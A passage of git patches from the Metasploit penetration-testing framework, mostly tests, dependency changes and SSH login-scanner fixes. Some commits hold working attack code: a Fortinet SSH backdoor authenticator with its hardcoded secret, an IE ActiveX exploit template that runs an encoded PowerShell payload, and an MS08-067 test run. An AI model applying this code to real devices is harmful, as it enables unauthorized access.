8.1">##{pr_num}</a>)</li> + </body> + </html> + | + end + + subject do + obj = described_class.new + obj.git_access_token = 'GITHUB_AUTH_TOKEN' + + octo = Octokit::Client.new + allow(octo).to receive(:commits).and_return(commits) + allow(obj).to receive(:git_client).and_return(octo) + obj + end + + let(:http_response) do + req = double('HttpResponse') + allow(req).to receive(:body).and_return(html) + req + end + + let(:module_name) { 'modules/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb' } + + let(:msf_mod) do + mod = double('Msf::Module') + init = double('Msf::Module#initialize') + allow(init).to receive(:source_location).and_return([ module_name ]) + allow(mod).to receive(:method).with(any_args).and_return(init) + mod + end + + before(:each) do + allow_any_instance_of(Net::HTTP).to receive(:request).with(any_args).and_return(http_response) + end + + describe '#initialize' do + it 'sets the owner property' do + expect(subject.owner).to eq('rapid7') + end + + it 'sets the repository' do + expect(subject.repository).to eq('rapid7/metasploit-framework') + end + + it 'sets the branch' do + expect(subject.branch).to eq('master') + end + + it 'sets the git access token' do + subject1 = described_class.new + subject1.git_access_token = 'FAKE KEY' + subject2 = described_class.new + expect(subject2.git_access_token).not_to eq(subject1.git_access_token) + end + + it 'sets Octokit::Client' do + expect(subject.git_client).to be_kind_of(Octokit::Client) + end + end + + describe '#search' do + context 'when a module is given' do + it 'returns a hash of pull requests' do + result = subject.search(msf_mod) + expect(result).to be_kind_of(Hash) + expect(result.keys.first).to eq(pr_num) + expect(result.first[1][:number]).to eq(pr_num) + expect(result.first[1][:title]).to include('Merged Pull Request') + end + end + end + + describe '#get_normalized_module_name' do + context 'when a module is given' do + it 'returns the module name' do + expect(subject.send(:get_normalized_module_name, msf_mod)).to eq(module_name) + end + end + end + + describe '#get_commits_from_file' do + context 'when a module path is given' do + it 'returns commits' do + expect(subject.send(:get_commits_from_file, module_name)).to eq(commits) + end + end + end + + describe '#get_author' do + context 'when a commit is given' do + it 'returns the author name' do + expect(subject.send(:get_author, commit)).to eq(author_name) + end + end + end + + describe '#is_author_blacklisted?' do + context 'when a commit authored by tabassassin is given' do + it 'returns true' do + c = double('commit') + allow(c).to receive(:author).and_return({author: 'tabassassin', login: 'tabassassin'}) + expect(subject.send(:is_author_blacklisted?, c)).to be_truthy + end + end + + context 'when a commit authored by a human is given' do + it 'returns false' do + expect(subject.send(:is_author_blacklisted?, commit)).to be_falsey + end + end + end + + describe '#get_pull_requests_from_commits' do + context 'when commits are given' do + it 'returns pull requests' do + pr = subject.send(:get_pull_requests_from_commits, commits) + expect(pr).to be_kind_of(Hash) + expect(pr.keys.first).to eq(pr_num) + end + end + end + + describe '#get_pull_request_from_commit' do + context 'when a commit is given' do + it 'returns a pull request' do + pr = subject.send(:get_pull_request_from_commit, commit) + expect(pr).to be_kind_of(Hash) + expect(pr[:number]).to eq(pr_num) + end + end + end + +end From 3125c99e45307b51cbd1317092dd071a722c20e3 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 24 Feb 2016 15:17:18 -0600 Subject: [PATCH 402/686] Remove this fake doc --- .../exploit/windows/browser/ms14_064_ole_code_execution.md | 1 - 1 file changed, 1 deletion(-) delete mode 100644 documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md diff --git a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md deleted file mode 100644 index 70a58ea7ff..0000000000 --- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md +++ /dev/null @@ -1 +0,0 @@ -# KEEP CALM AND EAT A COOKIE \ No newline at end of file From 58ad2175b8c2871c5a45e2a6a58e09f13857b815 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 24 Feb 2016 18:57:40 -0600 Subject: [PATCH 403/686] Raise when no network connection --- lib/msf/util/document_generator/pull_request_finder.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/util/document_generator/pull_request_finder.rb b/lib/msf/util/document_generator/pull_request_finder.rb index 484ddf7c18..d509df88bf 100644 --- a/lib/msf/util/document_generator/pull_request_finder.rb +++ b/lib/msf/util/document_generator/pull_request_finder.rb @@ -76,7 +76,12 @@ module Msf # @raise [PullRequestFinder::Exception] No commits found. # @return [Array<Sawyer::Resource>] def get_commits_from_file(path) - commits = git_client.commits(repository, branch, path: path) + begin + commits = git_client.commits(repository, branch, path: path) + rescue Faraday::ConnectionFailed + raise PullRequestFinder::Exception, 'No network connection to Github.' + end + if commits.empty? # Possibly the path is wrong. raise PullRequestFinder::Exception, 'No commits found.' From 4c58b67e3731690cb0fb9bbddd2cc4b048c91da5 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 24 Feb 2016 19:09:35 -0600 Subject: [PATCH 404/686] Update browser_autopwn2.md --- documentation/modules/auxiliary/server/browser_autopwn2.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md index 1c6eda26f3..38f1731b30 100644 --- a/documentation/modules/auxiliary/server/browser_autopwn2.md +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -137,6 +137,7 @@ resource scripts that can automatically do this: * bap_firefox_only.rc - For testing Firefox * bap_flash_only.rc - Fore testing Adobe Flash * bap_ie_only.rc - For testing Internet Explorer +* bap_dryrun_only.rc - Rickrolls the target, and shows you all the suitable exploits against that target. No exploits will actually be fired. Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities: From 95a9f42996dbbbe6f760ef005e56992cadef6cbd Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 24 Feb 2016 19:28:17 -0600 Subject: [PATCH 405/686] Add a template for future module documentation --- data/markdown_doc/module_doc_template.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 data/markdown_doc/module_doc_template.md diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md new file mode 100644 index 0000000000..551302e48c --- /dev/null +++ b/data/markdown_doc/module_doc_template.md @@ -0,0 +1 @@ +You can use this as a template for module documentation. \ No newline at end of file From 2ec7149ae79222ed45b9e5cde411391d4ddb92d5 Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Thu, 25 Feb 2016 10:59:50 -0600 Subject: [PATCH 406/686] Logging deprecations to STDERR --- lib/metasploit/framework/common_engine.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/metasploit/framework/common_engine.rb b/lib/metasploit/framework/common_engine.rb index f098144dc7..e968b0f75f 100644 --- a/lib/metasploit/framework/common_engine.rb +++ b/lib/metasploit/framework/common_engine.rb @@ -36,7 +36,7 @@ module Metasploit::Framework::CommonEngine config.paths.add 'data/meterpreter', glob: '**/ext_*' config.paths.add 'modules' - config.active_support.deprecation = :notify + config.active_support.deprecation = :stderr # # `initializer`s From cbc5b296e4a77f0fe03b0b173db2e2c1ca71d4b7 Mon Sep 17 00:00:00 2001 From: Gregory Mikeska <greg_mikeska@rapid7.com> Date: Thu, 25 Feb 2016 11:05:17 -0600 Subject: [PATCH 407/686] implement engines method locally instead of adding refinement --- Gemfile | 1 + Gemfile.lock | 2 +- lib/msf/base/simple/framework/module_paths.rb | 2 +- lib/msf/core/db_manager/migration.rb | 2 +- metasploit-framework.gemspec | 2 +- 5 files changed, 5 insertions(+), 4 deletions(-) diff --git a/Gemfile b/Gemfile index 9893680a4d..9431725238 100755 --- a/Gemfile +++ b/Gemfile @@ -21,6 +21,7 @@ group :development do end group :development, :test do + gem 'metasploit-concern', :git => "https://github.com/rapid7/metasploit-concern.git", :branch => "staging/MS-888/engines-is-deprecated" # automatically include factories from spec/factories gem 'factory_girl_rails', '~> 4.5.0' # Make rspec output shorter and more useful diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..5e9f267218 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -10,7 +10,7 @@ PATH jsobfu (~> 0.4.1) json metasm (~> 1.0.2) - metasploit-concern (= 1.0.0) + metasploit-concern metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) metasploit-payloads (= 1.1.0) diff --git a/lib/msf/base/simple/framework/module_paths.rb b/lib/msf/base/simple/framework/module_paths.rb index d2ba08fc3f..4b91f1b15b 100644 --- a/lib/msf/base/simple/framework/module_paths.rb +++ b/lib/msf/base/simple/framework/module_paths.rb @@ -21,7 +21,7 @@ module Msf allowed_module_paths << Msf::Config.user_module_directory end - Rails.application.railties.engines.each do |engine| + ::Rails::Engine.subclasses.map(&:instance).each do |engine| extract_engine_module_paths(engine).each do |path| allowed_module_paths << path end diff --git a/lib/msf/core/db_manager/migration.rb b/lib/msf/core/db_manager/migration.rb index 5d98eb960e..4c6430bd52 100644 --- a/lib/msf/core/db_manager/migration.rb +++ b/lib/msf/core/db_manager/migration.rb @@ -10,7 +10,7 @@ module Msf::DBManager::Migration "the .bundle/config manually and then `bundle install`" end - Rails.application.railties.engines.each do |engine| + ::Rails::Engine.subclasses.map(&:instance).each.each do |engine| migrations_paths = engine.paths['db/migrate'].existent_directories migrations_paths.each do |migrations_path| diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0aba1e8d59..663992b3c7 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -61,7 +61,7 @@ Gem::Specification.new do |spec| # Metasm compiler/decompiler/assembler spec.add_runtime_dependency 'metasm', '~> 1.0.2' # Metasploit::Concern hooks - spec.add_runtime_dependency 'metasploit-concern', '1.0.0' + spec.add_runtime_dependency 'metasploit-concern' # Metasploit::Credential database models spec.add_runtime_dependency 'metasploit-credential', '1.0.1' # Database models shared between framework and Pro. From 2277a97065d5cf40ae981bcd4e664611426b6688 Mon Sep 17 00:00:00 2001 From: Gregory Mikeska <greg_mikeska@rapid7.com> Date: Thu, 25 Feb 2016 11:12:49 -0600 Subject: [PATCH 408/686] Modify gemfile to point to topic branch on metasploit-concern --- Gemfile.lock | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 5e9f267218..9b21a2d3ef 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,3 +1,13 @@ +GIT + remote: https://github.com/rapid7/metasploit-concern.git + revision: cf2dbfc0cf0b60c9561357d00de4ece34058e13b + branch: staging/MS-888/engines-is-deprecated + specs: + metasploit-concern (1.0.1.pre.engines.pre.is.pre.deprecated) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + railties (>= 4.0.9, < 4.1.0) + PATH remote: . specs: @@ -108,10 +118,6 @@ GEM mail (2.6.3) mime-types (>= 1.16, < 3) metasm (1.0.2) - metasploit-concern (1.0.0) - activerecord (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) - railties (>= 4.0.9, < 4.1.0) metasploit-credential (1.0.1) metasploit-concern (~> 1.0) metasploit-model (~> 1.0) @@ -237,6 +243,7 @@ DEPENDENCIES cucumber-rails factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) + metasploit-concern! metasploit-framework! pry rake (>= 10.0.0) From f52f44cde00f8d90ac9bb9f9c2dbbe36441a7812 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 25 Feb 2016 11:21:45 -0600 Subject: [PATCH 409/686] Remove session_setup, since we're not in a shell A real shell. A real human bean. --- modules/auxiliary/scanner/karaf/login.rb | 37 ------------------------ 1 file changed, 37 deletions(-) diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/karaf/login.rb index 6a692a02b4..55bf1e9666 100644 --- a/modules/auxiliary/scanner/karaf/login.rb +++ b/modules/auxiliary/scanner/karaf/login.rb @@ -57,42 +57,6 @@ class Metasploit3 < Msf::Auxiliary datastore['RPORT'] end - def session_setup(result, ssh_socket) - return unless ssh_socket - - # Create a new session - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) - - merge_me = { - 'USERNAME' => result.credential.public, - 'PASSWORD' => result.credential.private - } - info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{datastore['RPORT']})" - s = start_session(self, info, merge_me, false, conn.lsock) - - # Set the session platform - case result.proof - when /Linux/ - s.platform = "linux" - when /Darwin/ - s.platform = "osx" - when /SunOS/ - s.platform = "solaris" - when /BSD/ - s.platform = "bsd" - when /HP-UX/ - s.platform = "hpux" - when /AIX/ - s.platform = "aix" - when /Win32|Windows/ - s.platform = "windows" - when /Unknown command or computer name/ - s.platform = "cisco-ios" - end - - s - end - def gather_proof proof = '' begin @@ -151,7 +115,6 @@ class Metasploit3 < Msf::Auxiliary credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) - session_setup(result, scanner.ssh_socket) when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? From 7d20e26a35d5557682716beedf93aae6357f0c07 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 25 Feb 2016 11:22:50 -0600 Subject: [PATCH 410/686] Move to aux/scanner/ssh --- modules/auxiliary/scanner/{karaf/login.rb => ssh/karaf_login.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/{karaf/login.rb => ssh/karaf_login.rb} (100%) diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb similarity index 100% rename from modules/auxiliary/scanner/karaf/login.rb rename to modules/auxiliary/scanner/ssh/karaf_login.rb From e3c570836384be256c5697b7a86257102c33ea4e Mon Sep 17 00:00:00 2001 From: James Barnett <James_Barnett@rapid7.com> Date: Thu, 25 Feb 2016 12:41:40 -0600 Subject: [PATCH 411/686] Support for tests that require the DB. Also update ms08-067 script with a few flags. --- features/modules/exploit/smb/ms08_067_netapi.feature | 7 ++++--- features/support/hooks.rb | 5 +++++ 2 files changed, 9 insertions(+), 3 deletions(-) diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index 6647c7083a..ca0cf23fe7 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -1,4 +1,4 @@ -@targets +@targets @db Feature: MS08-067 netapi Background: @@ -14,11 +14,12 @@ Feature: MS08-067 netapi hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') self.run_single('use exploit/windows/smb/ms08_067_netapi') self.run_single('set payload windows/meterpreter/bind_tcp') - hosts['windows'].each do |host| + hosts.each do |host| self.run_single("set RHOST #{host['ipAddress']}") - self.run_single('run') + self.run_single('run -j') sleep 1 end + self.run_single('sessions -K') </ruby> """ When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` diff --git a/features/support/hooks.rb b/features/support/hooks.rb index ff8ec3133c..411540031b 100644 --- a/features/support/hooks.rb +++ b/features/support/hooks.rb @@ -25,5 +25,10 @@ unless Bundler.settings.without.include?(:coverage) simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup') # set environment variable so child processes will merge their coverage data with parent process's coverage data. set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}") + + Before('@db') do |scenario| + dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) + ActiveRecord::Base.establish_connection(dbconfig["test"]) + end end end From 2366a7baa834293afdd4b5393a6c0865e904bdd8 Mon Sep 17 00:00:00 2001 From: James Barnett <James_Barnett@rapid7.com> Date: Thu, 25 Feb 2016 13:26:11 -0600 Subject: [PATCH 412/686] Use the correct step definition. --- features/modules/exploit/smb/ms08_067_netapi.feature | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index ca0cf23fe7..fa6001a720 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -23,5 +23,5 @@ Feature: MS08-067 netapi </ruby> """ When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` - Then the 'Mdm::Host' table contains the targets from 'features/support/targets.yml' + Then the 'Mdm::Host' table contains the expected targets \ No newline at end of file From 17447bea35a8a35d3c51b4e430c13dce9683e69f Mon Sep 17 00:00:00 2001 From: James Barnett <James_Barnett@rapid7.com> Date: Thu, 25 Feb 2016 13:39:04 -0600 Subject: [PATCH 413/686] Put the code in the wrong block. --- features/support/hooks.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/features/support/hooks.rb b/features/support/hooks.rb index 411540031b..0707c96444 100644 --- a/features/support/hooks.rb +++ b/features/support/hooks.rb @@ -25,10 +25,10 @@ unless Bundler.settings.without.include?(:coverage) simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup') # set environment variable so child processes will merge their coverage data with parent process's coverage data. set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}") + end - Before('@db') do |scenario| - dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) - ActiveRecord::Base.establish_connection(dbconfig["test"]) - end + Before('@db') do |scenario| + dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) + ActiveRecord::Base.establish_connection(dbconfig["test"]) end end From 7e25c7b87b58808363f8f5155e36d0282419014b Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 25 Feb 2016 14:35:37 -0600 Subject: [PATCH 414/686] Handle OpenSSL::Cipher::CipherError Our current net/ssh is petty outdated, so it is possible not being able to connect to certain SSH servers. --- lib/metasploit/framework/login_scanner/ssh.rb | 2 +- modules/auxiliary/scanner/ssh/karaf_login.rb | 9 +++++++-- 2 files changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/ssh.rb b/lib/metasploit/framework/login_scanner/ssh.rb index 069d1de5ec..cdc4bf71c9 100644 --- a/lib/metasploit/framework/login_scanner/ssh.rb +++ b/lib/metasploit/framework/login_scanner/ssh.rb @@ -78,7 +78,7 @@ module Metasploit opt_hash ) end - rescue ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error => e + rescue OpenSSL::Cipher::CipherError, ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error => e result_options.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e) rescue Net::SSH::Exception result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: e) diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb index 55bf1e9666..3269128284 100644 --- a/modules/auxiliary/scanner/ssh/karaf_login.rb +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb @@ -111,12 +111,17 @@ class Metasploit3 < Msf::Auxiliary ) case result.status when Metasploit::Model::Login::Status::SUCCESSFUL - print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}')" + print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'" credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT - vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" + if /key length too short/i === result.proof.message + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof} (net/ssh out of date)" + else + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof}" + end + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? invalidate_login(credential_data) when Metasploit::Model::Login::Status::INCORRECT From aa7c3f01a83cd4f1c797bc91e432cc8821d8360a Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 25 Feb 2016 14:39:19 -0600 Subject: [PATCH 415/686] Update name and description --- modules/auxiliary/scanner/ssh/karaf_login.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb index 3269128284..be6c4539c9 100644 --- a/modules/auxiliary/scanner/ssh/karaf_login.rb +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb @@ -20,9 +20,10 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Karaf Default Credential Scanner', + 'Name' => 'Apache Karaf Login Utility', 'Description' => %q{ - This module uses default Karaf credentials to login to the console via ssh. + This module attempts to log into Apache Karaf's SSH. If the TRYDEFAULTCRED option is + set, then it will also try the default 'karaf' credential. }, 'Author' => [ 'Samuel Huckins', From 1d2ec7a2398a1bfef3f23d5aa081d3ca11efe11e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 25 Feb 2016 14:46:53 -0600 Subject: [PATCH 416/686] Rescue OpenSSL::Cipher::CipherError Our current net/ssh library is out of date, so we need to rescue OpenSSL::Cipher::CipherError. --- modules/auxiliary/gather/apache_karaf_command_execution.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 80aa453541..17a4f0336b 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -87,6 +87,9 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(ip, user, opts) end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError From 83fad3e3285313c79a57196c887b75d83994027f Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 25 Feb 2016 14:40:02 -0600 Subject: [PATCH 417/686] Add Fortinet backdoor --- .../methods/fortinet_backdoor.rb | 95 +++++++++++++++++++ lib/net/ssh/authentication/session.rb | 1 + 2 files changed, 96 insertions(+) create mode 100644 lib/net/ssh/authentication/methods/fortinet_backdoor.rb diff --git a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb b/lib/net/ssh/authentication/methods/fortinet_backdoor.rb new file mode 100644 index 0000000000..cf6c3e04a5 --- /dev/null +++ b/lib/net/ssh/authentication/methods/fortinet_backdoor.rb @@ -0,0 +1,95 @@ +# -*- coding: binary -*- + +# https://www.ietf.org/rfc/rfc4256.txt + +class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract + + USERAUTH_INFO_REQUEST = 60 + USERAUTH_INFO_RESPONSE = 61 + + def authenticate(service_name, username = 'Fortimanager_Access', password = nil) + debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) + + loop do + message = session.next_message + + case message.type + when USERAUTH_SUCCESS + debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } + return true + when USERAUTH_FAILURE + debug { 'Received SSH_MSG_USERAUTH_FAILURE' } + return false + when USERAUTH_INFO_REQUEST + debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } + +=begin + string name (ISO-10646 UTF-8) + string instruction (ISO-10646 UTF-8) + string language tag (as defined in [RFC-3066]) + int num-prompts + string prompt[1] (ISO-10646 UTF-8) + boolean echo[1] + ... + string prompt[num-prompts] (ISO-10646 UTF-8) + boolean echo[num-prompts] +=end + name = message.read_string + instruction = message.read_string + _ = message.read_string + + prompts = [] + + message.read_long.times do + prompt = message.read_string + echo = message.read_bool + prompts << [prompt, echo] + end + + debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' } + + send_message(Net::SSH::Buffer.from( +=begin + byte SSH_MSG_USERAUTH_INFO_RESPONSE + int num-responses + string response[1] (ISO-10646 UTF-8) + ... + string response[num-responses] (ISO-10646 UTF-8) +=end + :byte, USERAUTH_INFO_RESPONSE, + :long, 1, + :string, custom_handler(name, instruction, prompts) + )) + else + raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}" + end + end + end + + # http://seclists.org/fulldisclosure/2016/Jan/26 + def custom_handler(title, instructions, prompt_list) + n = prompt_list[0][0] + m = Digest::SHA1.new + m.update("\x00" * 12) + m.update(n + 'FGTAbc11*xy+Qqz27') + m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70") + h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest) + [h] + end + +end diff --git a/lib/net/ssh/authentication/session.rb b/lib/net/ssh/authentication/session.rb index 7e07ccf696..0412f80722 100644 --- a/lib/net/ssh/authentication/session.rb +++ b/lib/net/ssh/authentication/session.rb @@ -7,6 +7,7 @@ require 'net/ssh/authentication/methods/publickey' require 'net/ssh/authentication/methods/hostbased' require 'net/ssh/authentication/methods/password' require 'net/ssh/authentication/methods/keyboard_interactive' +require 'net/ssh/authentication/methods/fortinet_backdoor' module Net; module SSH; module Authentication From 6188da054d671989c4dc65cc28f121af18afbf8d Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 25 Feb 2016 22:20:48 -0600 Subject: [PATCH 418/686] Remove // --- modules/exploits/windows/browser/ie_unsafe_scripting.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 5ea2ca6140..77c6106b8a 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -165,10 +165,10 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{ def psh_technique(var_shellobj, p) cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first)) js_content = %Q| -//<html><head></head><body><script> +<html><head></head><body><script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); #{var_shellobj}.run(unescape("#{cmd}"), 1, true); -//</script></html> +</script></html> | js_content From 5bf308e720bb3c6bf132f197d2318b9940f886fb Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Mon, 28 Dec 2015 14:12:50 -0600 Subject: [PATCH 419/686] WIP checkin --- .../ui/console/command_dispatcher/android.rb | 32 ++++++++++++++++++- 1 file changed, 31 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 4c6e39e4f4..ce4748dcef 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -43,7 +43,9 @@ class Console::CommandDispatcher::Android 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], 'interval_collect' => ['interval_collect'], - 'activity_start' => ['activity_start'] + 'activity_start' => ['activity_start'], + 'sqlite_read' => ['sqlite_read'], + 'sqlite_write' => ['sqlite_write'] } # Ensure any requirements of the command are met @@ -546,6 +548,34 @@ class Console::CommandDispatcher::Android end end +def cmd_sqlite_write(*args) + results = client.android.sqlite_write("SELECT 1") + p results +end + +def cmd_sqlite_read(*args) + path = "sqlite_read_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" + + read_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ], + '-o' => [ false, 'Output path for contacts list'] + ) + + read_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + print_line('Usage: sqlite_read [options]') + print_line(read_opts.usage) + return + when '-o' + path = val + end + end + + results = client.android.sqlite_read("") + p results + end + # # Name for this dispatcher # From 9010dac7bc0181461fe347542aa023f635ec872b Mon Sep 17 00:00:00 2001 From: HD Moore <x@hdm.io> Date: Mon, 8 Feb 2016 00:55:28 -0600 Subject: [PATCH 420/686] Wrap up the current WIP, still not functional --- .../post/meterpreter/extensions/android/android.rb | 10 ++++++++++ lib/rex/post/meterpreter/extensions/android/tlv.rb | 7 +++++++ .../ui/console/command_dispatcher/android.rb | 14 +++++++------- 3 files changed, 24 insertions(+), 7 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 800204d726..058cfb3d18 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -283,6 +283,16 @@ class Android < Extension end networks end + + def sqlite_read(dbname, query) + request = Packet.create_request('sqlite_read') + request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) + request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) + + p [TLV_TYPE_SQLITE_NAME, TLV_TYPE_SQLITE_QUERY] + response = client.send_request(request, 30) + end + end end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 